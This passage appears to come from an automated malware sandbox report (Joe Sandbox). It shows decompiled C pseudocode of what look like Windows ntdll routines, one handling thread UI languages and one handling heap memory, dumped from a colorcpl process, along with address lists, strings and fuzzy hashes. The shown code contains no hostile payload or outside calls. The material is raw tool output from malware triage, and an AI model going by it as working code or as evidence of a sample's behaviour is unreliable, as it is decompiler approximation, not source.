				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E06E2EEF0(0x6f07b60);
					_t134 =  *0x6f07b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x6f07b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x6f07b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E06E26D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E06E276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E06EB8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E06E1B150();
													}
													_t116 = E06EB6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E06E275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x6f08638; // 0xe36c38
																	_t122 = L06E238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E06E276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E06E276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L06E4FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L06E270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E06E4FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E06E4FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E06E4FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E06E4FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E06E4FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x6f07b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x6f07b84 = _t75;
						_t73 = E06E2EB70(_t134, 0x6f07b60);
						if( *0x6f07b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E06E2FF60( *0x6f07b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                0x06e4fab0
                                                                                                0x06e4fab2
                                                                                                0x06e4fab3
                                                                                                0x06e4fab4
                                                                                                0x06e4fabc
                                                                                                0x06e4fac0
                                                                                                0x06e4fb14
                                                                                                0x06e4fb17
                                                                                                0x06e4fac2
                                                                                                0x06e4fac8
                                                                                                0x06e4facd
                                                                                                0x06e4fad3
                                                                                                0x06e4fad3
                                                                                                0x06e4fadd
                                                                                                0x06e4fb18
                                                                                                0x06e4fb1b
                                                                                                0x06e4fb1d
                                                                                                0x06e4fb1e
                                                                                                0x06e4fb1f
                                                                                                0x06e4fb20
                                                                                                0x06e4fb21
                                                                                                0x06e4fb22
                                                                                                0x06e4fb23
                                                                                                0x06e4fb24
                                                                                                0x06e4fb25
                                                                                                0x06e4fb26
                                                                                                0x06e4fb27
                                                                                                0x06e4fb28
                                                                                                0x06e4fb29
                                                                                                0x06e4fb2a
                                                                                                0x06e4fb2b
                                                                                                0x06e4fb2c
                                                                                                0x06e4fb2d
                                                                                                0x06e4fb2e
                                                                                                0x06e4fb2f
                                                                                                0x06e4fb3a
                                                                                                0x06e4fb3b
                                                                                                0x06e4fb3e
                                                                                                0x06e4fb41
                                                                                                0x06e4fb44
                                                                                                0x06e4fb47
                                                                                                0x06e4fb4a
                                                                                                0x06e4fb4d
                                                                                                0x06e4fb53
                                                                                                0x06e8bdcb
                                                                                                0x06e8bdcb
                                                                                                0x06e4fb59
                                                                                                0x06e4fb5b
                                                                                                0x06e4fb5b
                                                                                                0x06e4fb5e
                                                                                                0x06e8bdd5
                                                                                                0x06e8bdd8
                                                                                                0x00000000
                                                                                                0x06e8bdda
                                                                                                0x00000000
                                                                                                0x06e8bdda
                                                                                                0x06e4fb64
                                                                                                0x06e4fb64
                                                                                                0x06e4fb64
                                                                                                0x06e4fb67
                                                                                                0x06e4fb6e
                                                                                                0x06e4fb70
                                                                                                0x06e4fb72
                                                                                                0x00000000
                                                                                                0x06e4fb78
                                                                                                0x06e4fb7a
                                                                                                0x06e4fb7a
                                                                                                0x06e4fb7d
                                                                                                0x06e4fb80
                                                                                                0x06e8bddf
                                                                                                0x06e8bde1
                                                                                                0x00000000
                                                                                                0x06e8bde3
                                                                                                0x00000000
                                                                                                0x06e8bde3
                                                                                                0x06e4fb86
                                                                                                0x06e4fb86
                                                                                                0x06e4fb86
                                                                                                0x06e4fb8b
                                                                                                0x06e4fb90
                                                                                                0x06e4fb92
                                                                                                0x06e4fb94
                                                                                                0x06e4fb9a
                                                                                                0x06e4fb9b
                                                                                                0x06e4fba1
                                                                                                0x06e8bde8
                                                                                                0x06e8bdeb
                                                                                                0x06e8bded
                                                                                                0x06e8beb5
                                                                                                0x06e8beb5
                                                                                                0x06e8bebb
                                                                                                0x06e8bebd
                                                                                                0x06e8bec3
                                                                                                0x06e8bed2
                                                                                                0x06e8bedd
                                                                                                0x06e8bedd
                                                                                                0x06e8beed
                                                                                                0x00000000
                                                                                                0x06e8bdf3
                                                                                                0x06e8bdfe
                                                                                                0x06e8be06
                                                                                                0x06e8be0b
                                                                                                0x06e8be0d
                                                                                                0x06e8be0f
                                                                                                0x06e8be14
                                                                                                0x06e8be19
                                                                                                0x06e8be20
                                                                                                0x06e8be25
                                                                                                0x06e8be27
                                                                                                0x06e8be35
                                                                                                0x06e8be39
                                                                                                0x06e8be46
                                                                                                0x06e8be4f
                                                                                                0x06e8be54
                                                                                                0x06e8be56
                                                                                                0x06e8bef8
                                                                                                0x06e8bef8
                                                                                                0x00000000
                                                                                                0x06e8be5c
                                                                                                0x06e8be5c
                                                                                                0x06e8be60
                                                                                                0x00000000
                                                                                                0x06e8be66
                                                                                                0x06e8be66
                                                                                                0x06e8be7f
                                                                                                0x06e8be84
                                                                                                0x06e8be87
                                                                                                0x06e8be89
                                                                                                0x06e8be8b
                                                                                                0x06e8be99
                                                                                                0x06e8be9d
                                                                                                0x06e8bea0
                                                                                                0x06e8beac
                                                                                                0x06e8beaf
                                                                                                0x06e8beb1
                                                                                                0x06e8beb3
                                                                                                0x06e8beb3
                                                                                                0x00000000
                                                                                                0x06e8bea2
                                                                                                0x06e8bea2
                                                                                                0x00000000
                                                                                                0x06e8bea2
                                                                                                0x06e8be8d
                                                                                                0x06e8be8d
                                                                                                0x06e8be92
                                                                                                0x00000000
                                                                                                0x06e8be92
                                                                                                0x06e8be8b
                                                                                                0x06e8be60
                                                                                                0x06e8be3b
                                                                                                0x06e8be3b
                                                                                                0x06e8be3e
                                                                                                0x00000000
                                                                                                0x06e8be40
                                                                                                0x06e8be40
                                                                                                0x06e8be44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8be44
                                                                                                0x06e8be3e
                                                                                                0x06e8be29
                                                                                                0x06e8be29
                                                                                                0x00000000
                                                                                                0x06e8be29
                                                                                                0x06e8be27
                                                                                                0x00000000
                                                                                                0x06e4fba7
                                                                                                0x06e4fba7
                                                                                                0x06e4fbab
                                                                                                0x06e8bf02
                                                                                                0x06e4fbb1
                                                                                                0x06e4fbb1
                                                                                                0x06e4fbb8
                                                                                                0x06e4fbbd
                                                                                                0x06e4fbbd
                                                                                                0x06e4fbbf
                                                                                                0x06e4fbbf
                                                                                                0x06e4fbc5
                                                                                                0x06e4fbcb
                                                                                                0x06e4fbf8
                                                                                                0x06e4fbf8
                                                                                                0x06e4fbfa
                                                                                                0x00000000
                                                                                                0x06e4fc00
                                                                                                0x06e4fc00
                                                                                                0x06e4fc03
                                                                                                0x00000000
                                                                                                0x06e4fc09
                                                                                                0x06e4fc09
                                                                                                0x06e4fc0f
                                                                                                0x06e4fc15
                                                                                                0x06e4fc23
                                                                                                0x06e4fc23
                                                                                                0x06e4fc25
                                                                                                0x06e4fc27
                                                                                                0x06e4fc75
                                                                                                0x06e4fc7c
                                                                                                0x06e4fc84
                                                                                                0x00000000
                                                                                                0x06e4fc29
                                                                                                0x06e4fc29
                                                                                                0x06e4fc2d
                                                                                                0x06e4fc30
                                                                                                0x06e8bf0f
                                                                                                0x00000000
                                                                                                0x06e4fc36
                                                                                                0x06e4fc38
                                                                                                0x06e4fc3b
                                                                                                0x06e4fc41
                                                                                                0x06e8bf17
                                                                                                0x06e8bf19
                                                                                                0x06e8bf48
                                                                                                0x06e8bf4b
                                                                                                0x00000000
                                                                                                0x06e8bf1b
                                                                                                0x06e8bf22
                                                                                                0x06e8bf24
                                                                                                0x06e8bf26
                                                                                                0x00000000
                                                                                                0x06e8bf2c
                                                                                                0x06e8bf37
                                                                                                0x06e8bf39
                                                                                                0x06e8bf3b
                                                                                                0x00000000
                                                                                                0x06e8bf41
                                                                                                0x06e8bf41
                                                                                                0x06e8bf41
                                                                                                0x06e8bf41
                                                                                                0x06e8bf45
                                                                                                0x00000000
                                                                                                0x06e8bf45
                                                                                                0x06e8bf3b
                                                                                                0x06e8bf26
                                                                                                0x00000000
                                                                                                0x06e4fc47
                                                                                                0x06e4fc47
                                                                                                0x06e4fc49
                                                                                                0x06e4fcb2
                                                                                                0x06e4fcb4
                                                                                                0x06e4fcb6
                                                                                                0x06e4fcdc
                                                                                                0x06e4fcdc
                                                                                                0x00000000
                                                                                                0x06e4fcb8
                                                                                                0x06e4fcc3
                                                                                                0x06e4fcc5
                                                                                                0x06e4fcc7
                                                                                                0x00000000
                                                                                                0x06e4fcc9
                                                                                                0x06e4fcc9
                                                                                                0x06e4fccd
                                                                                                0x00000000
                                                                                                0x06e4fccd
                                                                                                0x06e4fcc7
                                                                                                0x00000000
                                                                                                0x06e4fc4b
                                                                                                0x06e4fc4b
                                                                                                0x06e4fc4e
                                                                                                0x06e4fc4e
                                                                                                0x06e4fc51
                                                                                                0x06e4fc51
                                                                                                0x06e4fc54
                                                                                                0x06e4fc5a
                                                                                                0x06e4fc5c
                                                                                                0x06e4fc5f
                                                                                                0x06e4fc61
                                                                                                0x06e4fc63
                                                                                                0x06e4fc65
                                                                                                0x06e4fc67
                                                                                                0x06e4fc6e
                                                                                                0x06e4fc72
                                                                                                0x06e4fc72
                                                                                                0x06e4fc72
                                                                                                0x06e4fc72
                                                                                                0x06e4fc67
                                                                                                0x06e4fc61
                                                                                                0x00000000
                                                                                                0x06e4fc5a
                                                                                                0x06e4fc49
                                                                                                0x06e4fc41
                                                                                                0x06e4fc30
                                                                                                0x06e4fc27
                                                                                                0x06e4fc03
                                                                                                0x06e4fbcd
                                                                                                0x06e4fbd3
                                                                                                0x06e4fbd9
                                                                                                0x06e4fbdc
                                                                                                0x06e4fbde
                                                                                                0x06e4fc99
                                                                                                0x06e4fc9b
                                                                                                0x06e4fc9d
                                                                                                0x06e4fcd5
                                                                                                0x06e4fcd5
                                                                                                0x06e4fc89
                                                                                                0x06e4fc89
                                                                                                0x00000000
                                                                                                0x06e4fc9f
                                                                                                0x06e4fc9f
                                                                                                0x06e4fca3
                                                                                                0x00000000
                                                                                                0x06e4fca3
                                                                                                0x00000000
                                                                                                0x06e4fbe4
                                                                                                0x06e4fbe4
                                                                                                0x06e4fbe4
                                                                                                0x06e4fbe4
                                                                                                0x06e4fbe9
                                                                                                0x06e4fbf2
                                                                                                0x00000000
                                                                                                0x06e4fbf2
                                                                                                0x06e4fbde
                                                                                                0x06e4fbcb
                                                                                                0x06e4fbab
                                                                                                0x06e4fc8b
                                                                                                0x06e4fc8b
                                                                                                0x06e4fc8c
                                                                                                0x06e4fb80
                                                                                                0x06e4fb72
                                                                                                0x06e4fb5e
                                                                                                0x06e4fc8d
                                                                                                0x06e4fc91
                                                                                                0x06e4fadf
                                                                                                0x06e4fadf
                                                                                                0x06e4fae1
                                                                                                0x06e4fae4
                                                                                                0x06e4fae7
                                                                                                0x06e4faec
                                                                                                0x06e4faf8
                                                                                                0x06e4fb00
                                                                                                0x06e4fb07
                                                                                                0x06e4fb0f
                                                                                                0x06e4fb0f
                                                                                                0x06e4fb07
                                                                                                0x00000000
                                                                                                0x06e4faf8
                                                                                                0x06e4fadd

                                                                                                Strings
                                                                                                • 8l, xrefs: 06E8BE66
                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 06E8BE0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$8l
                                                                                                • API String ID: 0-1476619989
                                                                                                • Opcode ID: fd6fab6df4b1e0aeb718f78a7138fa227a8623a9cdf445f90061baa5dbec8007
                                                                                                • Instruction ID: 888dfd78c0b86c6ac7d5f828d17f7b8e908f5e30e409b3dd9354e1441bce96ba
                                                                                                • Opcode Fuzzy Hash: fd6fab6df4b1e0aeb718f78a7138fa227a8623a9cdf445f90061baa5dbec8007
                                                                                                • Instruction Fuzzy Hash: 80A1F471F007069FEBA5FF74D850BBAB3A5AF84B14F055569E91ADB680DB30D801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EDE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E06EDE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E06EDBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E06EDBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E06EDAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E06E59730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E06EDA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E06EDA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E06E59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E06EDA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E06EDA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E06E32280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E06E2B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E06E2FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E06E37D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E06ECFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                0x06ede547
                                                                                                0x06ede549
                                                                                                0x06ede54f
                                                                                                0x06ede553
                                                                                                0x06ede557
                                                                                                0x06ede55a
                                                                                                0x06ede55c
                                                                                                0x06ede55f
                                                                                                0x06ede561
                                                                                                0x06ede567
                                                                                                0x06ede56b
                                                                                                0x06ede7e2
                                                                                                0x00000000
                                                                                                0x06ede571
                                                                                                0x06ede575
                                                                                                0x06ede577
                                                                                                0x06ede57b
                                                                                                0x06ede57c
                                                                                                0x06ede57d
                                                                                                0x06ede57e
                                                                                                0x06ede57f
                                                                                                0x06ede588
                                                                                                0x06ede58f
                                                                                                0x06ede591
                                                                                                0x06ede592
                                                                                                0x06ede592
                                                                                                0x06ede596
                                                                                                0x06ede59e
                                                                                                0x06ede5a0
                                                                                                0x06ede5a6
                                                                                                0x06ede61d
                                                                                                0x06ede61d
                                                                                                0x06ede621
                                                                                                0x06ede623
                                                                                                0x06ede630
                                                                                                0x06ede630
                                                                                                0x06ede7e6
                                                                                                0x06ede7eb
                                                                                                0x06ede7ed
                                                                                                0x06ede7f4
                                                                                                0x06ede7fa
                                                                                                0x06ede7ff
                                                                                                0x06ede7ff
                                                                                                0x06ede80a
                                                                                                0x06ede812
                                                                                                0x06ede812
                                                                                                0x06ede5ab
                                                                                                0x06ede5b4
                                                                                                0x06ede5b9
                                                                                                0x06ede5be
                                                                                                0x06ede5c0
                                                                                                0x06ede5c2
                                                                                                0x06ede5c8
                                                                                                0x06ede5c9
                                                                                                0x06ede5cb
                                                                                                0x06ede5cc
                                                                                                0x06ede5d5
                                                                                                0x06ede5e4
                                                                                                0x06ede5f1
                                                                                                0x06ede5f8
                                                                                                0x06ede5f8
                                                                                                0x06ede5d5
                                                                                                0x06ede602
                                                                                                0x06ede616
                                                                                                0x06ede63d
                                                                                                0x06ede644
                                                                                                0x06ede64d
                                                                                                0x06ede652
                                                                                                0x06ede657
                                                                                                0x06ede659
                                                                                                0x06ede65b
                                                                                                0x06ede661
                                                                                                0x06ede662
                                                                                                0x06ede664
                                                                                                0x06ede665
                                                                                                0x06ede66e
                                                                                                0x06ede67d
                                                                                                0x06ede68a
                                                                                                0x06ede691
                                                                                                0x06ede691
                                                                                                0x06ede66e
                                                                                                0x06ede6b0
                                                                                                0x00000000
                                                                                                0x06ede6b6
                                                                                                0x06ede6bd
                                                                                                0x06ede6c7
                                                                                                0x06ede6d7
                                                                                                0x06ede6d9
                                                                                                0x06ede6db
                                                                                                0x06ede6de
                                                                                                0x06ede6e3
                                                                                                0x06ede6f3
                                                                                                0x06ede6fc
                                                                                                0x06ede700
                                                                                                0x06ede700
                                                                                                0x06ede704
                                                                                                0x06ede70a
                                                                                                0x06ede70a
                                                                                                0x06ede713
                                                                                                0x06ede716
                                                                                                0x06ede719
                                                                                                0x06ede720
                                                                                                0x06ede761
                                                                                                0x06ede76b
                                                                                                0x06ede774
                                                                                                0x06ede77a
                                                                                                0x06ede77a
                                                                                                0x06ede78a
                                                                                                0x06ede791
                                                                                                0x06ede799
                                                                                                0x06ede79b
                                                                                                0x06ede79f
                                                                                                0x06ede7aa
                                                                                                0x06ede7c0
                                                                                                0x06ede7ac
                                                                                                0x06ede7b2
                                                                                                0x06ede7b9
                                                                                                0x06ede7b9
                                                                                                0x06ede7c7
                                                                                                0x06ede806
                                                                                                0x00000000
                                                                                                0x06ede7c9
                                                                                                0x06ede7d1
                                                                                                0x06ede7d8
                                                                                                0x00000000
                                                                                                0x06ede7d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ede722
                                                                                                0x06ede72e
                                                                                                0x06ede748
                                                                                                0x06ede74c
                                                                                                0x06ede754
                                                                                                0x06ede756
                                                                                                0x06ede75c
                                                                                                0x06ede75c
                                                                                                0x00000000
                                                                                                0x06ede75c
                                                                                                0x06ede758
                                                                                                0x06ede758
                                                                                                0x00000000
                                                                                                0x06ede758
                                                                                                0x06ede750
                                                                                                0x00000000
